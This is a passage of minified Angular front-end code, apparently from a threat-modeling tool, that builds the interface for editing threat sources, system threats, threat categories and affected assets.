"),m(65,"button",16),he("click",function(){return i.ResetNumbers()}),s(66),oe(67,"translate"),u(),s(68,"\n          "),u(),s(69,"\n        "),u(),s(70,"\n        "),ne(71,agt,15,9,"mat-list-item",17),s(72,"\n      "),u(),s(73,"\n    "),u(),s(74,"\n    "),m(75,"div",18),s(76,"\n      "),ne(77,rgt,32,13,"ng-container",19),s(78,"\n    "),u(),s(79,"\n  "),u(),s(80,"\n  "),it(81,"mat-divider"),s(82,"\n  "),m(83,"div"),s(84,"\n    "),m(85,"mat-form-field",20),s(86,"\n      "),m(87,"mat-label"),s(88),oe(89,"translate"),u(),s(90,"\n      "),m(91,"textarea",21),he("ngModelChange",function(r){return i.threatSources.Description=r}),u(),s(92,"\n    "),u(),s(93,"\n  "),u(),s(94,"\n"),u()),2&e){const n=Ti(40),r=Ti(52),c=Ti(63);C(4),V("expanded",!0),C(5),ct("\n          ",re(10,24,"general.HowTo"),"\n        "),C(4),ct("\n          ",re(14,26,"general.ThreatSources"),"\n          "),C(7),at("innerHTML",re(21,28,"pages.modeling.threatsources.howto.d"),Hc),C(9),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(3),ct("",re(33,30,"general.ThreatSources")," \n          "),C(2),at("matTooltip",re(35,32,"general.Add")),V("matMenuTriggerFor",n),C(9),ke(re(44,34,"general.New")),C(3),V("matMenuTriggerFor",r),C(1),ke(re(48,36,"general.Predefined")),C(7),V("ngForOf",i.GetPossibleThreatSources()),C(3),at("matTooltip",re(58,38,"general.More")),V("matMenuTriggerFor",c),C(8),V("disabled",i.threatSources.Sources.length<2),C(1),ke(re(67,40,"pages.modeling.threattable.resetNumbers")),C(5),V("ngForOf",i.threatSources.Sources),C(6),V("ngIf",i.selectedSource),C(11),ke(re(89,42,"general.Notes")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatSources.Description)}},dependencies:[Zi,Ri,an,Ac,Ta,gm,Ed,Ea,Rd,Sd,oa,da,nn,pp,un,jr,Go,Xa,es,ts,Or,Lr,rc,_p,Xo,qo,po,Pa,tl,Ec,Dc,el,Il,xZ,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();const cgt=["nameBox"];function lgt(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(B().systemThreat.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function dgt(t,a){if(1&t&&(m(0,"mat-option",15),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B();V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function mgt(t,a){1&t&&(m(0,"mat-hint",16),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n      ",re(2,1,"messages.error.numberAlreadyExists"),"\n    "))}function ugt(t,a){if(1&t&&(m(0,"mat-option",19),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),V("value",e),C(1),ct("\n        ",e.Name,"\n      ")}}function hgt(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",5),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",17),he("valueChange",function(n){return be(e),Me(B().systemThreat.ThreatCategory=n)}),s(7,"\n      "),ne(8,ugt,2,3,"mat-option",18),s(9,"\n    "),u(),s(10,"\n  "),u()}if(2&t){const e=B();C(3),ke(re(4,3,"general.ThreatCategory")),C(3),V("value",e.systemThreat.ThreatCategory),C(2),V("ngForOf",e.GetThreatCategories())}}function fgt(t,a){if(1&t){const e=Ye();m(0,"table",20),s(1,"\n      "),m(2,"tr")(3,"td")(4,"mat-checkbox",21),he("change",function(){const r=be(e).$implicit,c=B();return Me(c.ImpactCatChanged(c.systemThreat.ImpactCats,r))}),s(5),oe(6,"translate"),u()()(),s(7,"\n    "),u()}if(2&t){const e=a.$implicit,i=B();C(4),V("checked",i.systemThreat.ImpactCats.includes(e)),C(1),ke(re(6,2,i.GetImpactCategoryName(e)))}}let pgt=(()=>{class t{constructor(e){this.dataService=e,this.showThreatCat=!1}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}GetThreatCategories(){return this.dataService.Config.GetThreatCategories()}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}ImpactCatChanged(e,i){const n=e.indexOf(i);n>=0?e.splice(n,1):e.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-system-threat"]],viewQuery:function(e,i){if(1&e&&Mi(cgt,5),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},inputs:{systemThreat:"systemThreat",showThreatCat:"showThreatCat"},decls:62,vars:28,consts:[["appearance","fill",2,"width","100%"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","type","text",3,"spellcheck","ngModel","ngModelChange"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["appearance","fill",2,"width","70px","float","right","margin-left","10px"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill","class","property-form-field",4,"ngIf"],[2,"margin-top","10px","display","flex","flex-wrap","wrap"],["style","min-width: 200px;",4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"value"],[1,"alert","alert-danger",2,"color","red"],[3,"value","valueChange"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],[2,"min-width","200px"],["color","primary",3,"checked","change"]],template:function(e,i){1&e&&(m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",0),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",1,2),he("ngModelChange",function(r){return i.systemThreat.Name=r}),u(),s(10,"\n    "),ne(11,lgt,6,3,"button",3),s(12,"\n  "),u(),s(13,"\n  "),it(14,"br"),s(15,"\n  "),m(16,"mat-form-field",0),s(17,"\n    "),m(18,"mat-label"),s(19),oe(20,"translate"),u(),s(21,"\n    "),m(22,"textarea",4),he("ngModelChange",function(r){return i.systemThreat.Description=r}),u(),s(23,"\n  "),u(),s(24,"\n  "),it(25,"br"),s(26,"\n  "),m(27,"mat-form-field",5),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    "),m(33,"mat-select",6),he("valueChange",function(r){return i.systemThreat.Impact=r}),oe(34,"translate"),s(35,"\n      "),ne(36,dgt,3,4,"mat-option",7),s(37,"\n    "),u(),s(38,"\n  "),u(),s(39,"\n  "),m(40,"mat-form-field",8),s(41,"\n    "),m(42,"mat-label"),s(43),oe(44,"translate"),u(),s(45,"\n    "),m(46,"input",9),he("ngModelChange",function(r){return i.systemThreat.Number=r}),u(),s(47,"\n    "),ne(48,mgt,3,3,"mat-hint",10),s(49,"\n  "),u(),s(50,"\n  "),it(51,"br"),s(52,"\n  "),ne(53,hgt,11,5,"mat-form-field",11),s(54,"\n  "),it(55,"br"),s(56,"\n  "),m(57,"div",12),s(58,"\n    "),ne(59,fgt,8,4,"table",13),s(60,"\n  "),u(),s(61,"\n"),u()),2&e&&(C(5),ke(re(6,18,"general.Name")),C(3),at("matTooltip",i.systemThreat.Name),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.systemThreat.Name),C(3),V("ngIf",i.systemThreat.Name),C(8),ke(re(20,20,"properties.consequencesImpact")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.systemThreat.Description),C(8),ke(re(31,22,"properties.Impact")),C(3),at("matTooltip",re(34,24,i.GetLMHName(i.systemThreat.Impact))),V("value",i.systemThreat.Impact),C(3),V("ngForOf",i.GetLMHValues()),C(7),ke(re(44,26,"general.Number")),C(3),at("matTooltip",i.systemThreat.Number),V("ngModel",i.systemThreat.Number),C(2),V("ngIf",i.systemThreat.CheckUniqueNumber()),C(5),V("ngIf",i.showThreatCat),C(6),V("ngForOf",i.GetImpactCategories()))},dependencies:[Zi,Ri,an,Ac,Ta,gm,Ed,Ea,oa,br,da,nn,pp,un,jr,Nr,yr,Go,Xa,Pa,Xi],styles:[".property-form-field[_ngcontent-%COMP%]{width:300px}"]}),t})();const _gt=["assetsTree"],ggt=["catsTree"];function Cgt(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",21),he("click",function(){const r=be(e).$implicit;return Me(B().selectedThreat=r)}),s(1,"\n                  "),m(2,"mat-icon",22),s(3,"arrow_right"),u(),s(4,"\n                  "),m(5,"div",23),s(6),u(),s(7,"\n                  "),m(8,"div",23),s(9),oe(10,"translate"),oe(11,"translate"),u(),s(12,"\n                  "),m(13,"button",24),he("click",function(){const r=be(e).$implicit;return Me(B().DeleteThreat(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"delete"),u()(),s(17,"\n                "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.selectedThreat===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreat===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.GetLongName()),C(3),za("",re(10,9,"properties.Impact"),": ",re(11,11,i.GetLMHName(e.Impact)),""),C(4),at("matTooltip",re(14,13,"general.Delete"))}}function ygt(t,a){if(1&t&&(m(0,"div",14),s(1,"\n            "),it(2,"app-system-threat",25),s(3,"\n          "),u()),2&t){const e=B();C(2),V("systemThreat",e.selectedThreat)}}let bgt=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.locStorage=n,this._selectedThreat=null}get systemThreats(){return this.dataService.Project.GetSystemThreats()}get selectedThreat(){return this._selectedThreat}set selectedThreat(e){var i;if(this._selectedThreat=e,e&&e.ThreatCategory?(this.selectedCategoryNode=xa.FlattenNodes(this.categoryNodes).find(n=>n.data==e.ThreatCategory),this.catsTree&&(this.catsTree.checkedNodes=[this.selectedCategoryNode])):this.catsTree&&(this.catsTree.checkedNodes=null),e&&(null===(i=e.AffectedAssetObjects)||void 0===i?void 0:i.length)>0){const n=xa.FlattenNodes(this.assetNodes);this.selectedAssetNode=n.find(r=>r.data==e.AffectedAssetObjects[0]),this.assetsTree&&(this.assetsTree.checkedNodes=n.filter(r=>e.AffectedAssetObjects.includes(r.data)))}else this.assetsTree&&(this.assetsTree.checkedNodes=null)}get selectedAssetNode(){return this._selectedAssetNode}set selectedAssetNode(e){this._selectedAssetNode=e}get selectedAssetObject(){var e;return null===(e=this.selectedAssetNode)||void 0===e?void 0:e.data}get selectedCategoryNode(){return this._selectedCategoryNode}set selectedCategoryNode(e){this._selectedCategoryNode=e}get selectedCategory(){var e;return null===(e=this._selectedCategoryNode)||void 0===e?void 0:e.data}OnCheckedAssetNodesChanged(e){this.selectedThreat&&(this.selectedThreat.AffectedAssetObjects=null==e?void 0:e.map(i=>i.data))}OnCheckedCategoryChanged(e){this.selectedThreat&&(this.selectedThreat.ThreatCategory=1==(null==e?void 0:e.length)?e[0].data:null)}ngOnInit(){}ngAfterViewInit(){setTimeout(()=>{this.createAssetNodes(),this.createCategoryNodes()},10)}DeleteThreat(e){this.dataService.Project.DeleteSystemThreat(e),this.selectedThreat==e&&(this.selectedThreat=null)}AddThreat(){let e=this.dataService.Project.CreateSystemThreat(this.selectedCategory);this.selectedThreat=e,setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}ResetNumbers(){const e=this.systemThreats;for(let i=0;i<e.length;i++)e[i].Number=(i+1).toString()}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}drop(e,i){Qs(i,e.previousIndex,e.currentIndex)}dropWrapper(e,i){const n=this.systemThreats.indexOf(i[e.previousIndex]),r=this.systemThreats.indexOf(i[e.currentIndex]);Qs(this.systemThreats,n,r)}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_MODELING_ASSETS_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_MODELING_ASSETS_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes))}createAssetNodes(){const e=this.assetNodes;this.assetNodes=[];let i=this.dataService.Project,r=(d,T)=>{let k={name:()=>d.Name,canSelect:!0,canCheck:!0,checkEnabled:!0,isChecked:!1,isInactive:()=>!d.IsActive,data:d,children:[]};return null==k.isExpanded&&!d.IsActive&&(k.isExpanded=!1),d.AssociatedData.forEach(q=>{let Y=((d,T)=>({name:()=>d.Name,canSelect:!0,canCheck:!0,checkEnabled:!0,isChecked:!1,isInactive:()=>!T.IsActive,data:d,iconAlignLeft:!0,icon:"description"}))(q,d);k.children.push(Y)}),d.SubGroups.forEach(q=>{let Y=r(q,T);k.children.push(Y)}),T.push(k),k},c=[];if(i.GetProjectAssetGroup()){let d=r(i.GetProjectAssetGroup(),c);d.canSelect=d.canCheck=!1,d.icon=Zl.Icon,d.iconAlignLeft=!1,d.name=()=>"Assets",d.hasMenu=!0,this.assetNodes.push(d)}i.GetDevices().filter(d=>null!=d.AssetGroup).forEach(d=>{let T=r(d.AssetGroup,c);T.canSelect=T.canCheck=!1,T.icon=Ou.Icon,T.iconAlignLeft=!1,T.name=()=>d.Name,T.hasMenu=!0,this.assetNodes.push(T)}),i.GetMobileApps().filter(d=>null!=d.AssetGroup).forEach(d=>{let T=r(d.AssetGroup,c);T.icon=cf.Icon,T.iconAlignLeft=!1,T.name=()=>d.Name,T.hasMenu=!0,this.assetNodes.push(T)}),xa.TransferExpandedState(e,this.assetNodes),this.assetsTree.SetNavTreeData(this.assetNodes)}createCategoryNodes(){const e=this.categoryNodes;this.categoryNodes=[];let r={name:()=>"Threat Category Groups",canSelect:!1,icon:"flash_on",hasMenu:!0,children:[]};this.dataService.Config.GetThreatCategoryGroups().forEach(c=>{let d=(c=>({name:()=>c.Name,canSelect:!1,data:c,children:[]}))(c);c.ThreatCategories.forEach(T=>d.children.push((c=>({name:()=>c.Name,canSelect:!0,canCheck:!0,checkEnabled:!0,isChecked:!1,data:c}))(T))),r.children.push(d)}),this.categoryNodes.push(r),xa.TransferExpandedState(e,this.categoryNodes),this.catsTree.SetNavTreeData(this.categoryNodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-identification"]],viewQuery:function(e,i){if(1&e&&(Mi(_gt,5),Mi(ggt,5)),2&e){let n;Vt(n=Bt())&&(i.assetsTree=n.first),Vt(n=Bt())&&(i.catsTree=n.first)}},decls:98,vars:94,consts:[[2,"width","100%","height","100%"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","order"],["direction","vertical","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[2,"font-weight","bold","text-align","center"],[3,"checkEnabled","activeNode","selectedNodeChanged","checkedNodesChanged"],["assetsTree",""],[1,"disable",3,"selectedObject"],["mat-subheader","",2,"padding-bottom","0px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"float","right",3,"matMenuTriggerFor","matTooltip"],["moreMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],[2,"margin-bottom","10px",3,"size","order"],[2,"padding","10px"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],[2,"overflow","auto"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],["style","padding: 10px",4,"ngIf"],[3,"canCheckMultiple","checkEnabled","activeNode","selectedNodeChanged","checkedNodesChanged"],["catsTree",""],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[3,"systemThreat"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"as-split",1),he("dragEnd",function(r){return i.OnSplitSizeChange(r,0)}),s(3,"\n    "),m(4,"as-split-area",2),s(5,"\n      "),m(6,"as-split",3),he("dragEnd",function(r){return i.OnSplitSizeChange(r,1)}),s(7,"\n        "),m(8,"div",4),s(9),oe(10,"translate"),u(),s(11,"\n        "),m(12,"as-split-area",2),s(13,"\n          "),m(14,"app-nav-tree",5,6),he("selectedNodeChanged",function(r){return i.selectedAssetNode=r})("checkedNodesChanged",function(r){return i.OnCheckedAssetNodesChanged(r)}),u(),s(16,"\n        "),u(),s(17,"\n        "),m(18,"as-split-area",2),s(19,"\n          "),it(20,"app-properties",7),s(21,"\n        "),u(),s(22,"\n      "),u(),s(23,"\n    "),u(),s(24,"\n\n    "),m(25,"as-split-area",2),s(26,"\n      "),m(27,"as-split",3),he("dragEnd",function(r){return i.OnSplitSizeChange(r,2)}),s(28,"\n        "),m(29,"div",4),s(30),oe(31,"translate"),u(),s(32,"\n        "),m(33,"div",8),s(34),oe(35,"translate"),m(36,"button",9),he("click",function(){return i.AddThreat()}),oe(37,"translate"),m(38,"mat-icon"),s(39,"add"),u()(),s(40,"\n          "),m(41,"button",10),oe(42,"translate"),m(43,"mat-icon"),s(44,"more_vert"),u()(),s(45,"\n          "),m(46,"mat-menu",null,11),s(48,"\n            "),m(49,"button",12),he("click",function(){return i.ResetNumbers()}),s(50),oe(51,"translate"),u(),s(52,"\n          "),u(),s(53,"\n        "),u(),s(54,"\n        "),m(55,"as-split-area",13),s(56,"\n          "),m(57,"div",14),s(58,"\n            "),m(59,"mat-list",15),he("cdkDropListDropped",function(r){return i.drop(r,i.systemThreats)}),s(60,"\n              "),m(61,"div",16),s(62,"\n                "),ne(63,Cgt,18,15,"mat-list-item",17),s(64,"\n              "),u(),s(65,"\n            "),u(),s(66,"\n          "),u(),s(67,"\n        "),u(),s(68,"\n        "),m(69,"as-split-area",2),s(70,"\n          "),ne(71,ygt,4,1,"div",18),s(72,"\n        "),u(),s(73,"\n      "),u(),s(74,"\n    "),u(),s(75,"\n\n    "),m(76,"as-split-area",2),s(77,"\n      "),m(78,"as-split",3),he("dragEnd",function(r){return i.OnSplitSizeChange(r,3)}),s(79,"\n        "),m(80,"div",4),s(81),oe(82,"translate"),u(),s(83,"\n        "),m(84,"as-split-area",2),s(85,"\n          "),m(86,"app-nav-tree",19,20),he("selectedNodeChanged",function(r){return i.selectedCategoryNode=r})("checkedNodesChanged",function(r){return i.OnCheckedCategoryChanged(r)}),u(),s(88,"\n        "),u(),s(89,"\n        "),m(90,"as-split-area",2),s(91,"\n          "),it(92,"app-properties",7),s(93,"\n        "),u(),s(94,"\n      "),u(),s(95,"\n    "),u(),s(96,"\n  "),u(),s(97,"\n"),u()),2&e){const n=Ti(47);C(2),V("gutterSize",3)("restrictMove",!0),C(2),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),V("size",i.GetSplitSize(0,0,350))("order",1),C(2),V("gutterSize",3)("restrictMove",!0),C(3),ke(re(10,80,"general.Assets")),C(3),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,0,"*"))("order",1),C(2),V("checkEnabled",null!=i.selectedThreat)("activeNode",i.selectedAssetNode),C(4),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,1,120))("order",2),C(2),V("selectedObject",i.selectedAssetObject),C(5),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(0,1,"*"))("order",2),C(2),V("gutterSize",3)("restrictMove",!0),C(3),ke(re(31,82,"general.SystemThreats")),C(4),ct("",re(35,84,"general.Threats")," \n          "),C(2),at("matTooltip",re(37,86,"general.Add")),C(5),at("matTooltip",re(42,88,"general.More")),V("matMenuTriggerFor",n),C(8),V("disabled",i.systemThreats.length<2),C(1),ke(re(51,90,"pages.modeling.threattable.resetNumbers")),C(5),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),V("size",i.GetSplitSize(2,0,200))("order",1),C(8),V("ngForOf",i.systemThreats),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(2,1,"*"))("order",2),C(2),V("ngIf",i.selectedThreat),C(5),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(0,2,350))("order",3),C(2),V("gutterSize",3)("restrictMove",!0),C(3),ke(re(82,92,"general.ThreatCategories")),C(3),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),V("size",i.GetSplitSize(3,0,"*"))("order",1),C(2),V("canCheckMultiple",!1)("checkEnabled",null!=i.selectedThreat)("activeNode",i.selectedCategoryNode),C(4),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(3,1,120))("order",2),C(2),V("selectedObject",i.selectedCategory)}},dependencies:[Zi,Ri,Zh,xp,Rd,Sd,oa,da,es,ts,Or,Lr,rc,Xo,qo,po,Pa,df,TZ,pgt,Xi],styles:['.primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.tabGroup[_ngcontent-%COMP%]     .mat-tab-header .mat-tab-labels .mat-tab-label{height:25px}.tabGroup[_ngcontent-%COMP%]     .mat-tab-labels .mat-tab-label{min-width:120px}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();const Mgt=["search"];function vgt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"input",8,9),he("ngModelChange",function(n){return be(e),Me(B().searchString=n)}),oe(4,"translate"),u(),s(5,"\n    "),m(6,"button",10),he("click",function(){be(e);const n=B();return Me(n.keepTreeStructure=!n.keepTreeStructure)}),oe(7,"translate"),s(8,"\n      "),m(9,"mat-icon"),s(10,"account_tree"),u(),s(11,"\n    "),u(),s(12,"\n    "),m(13,"button",11),he("click",function(){return be(e),Me(B().searchString=null)}),oe(14,"translate"),s(15,"\n      "),m(16,"mat-icon"),s(17,"close"),u(),s(18,"\n    "),u(),s(19,"\n  "),Mt()}if(2&t){const 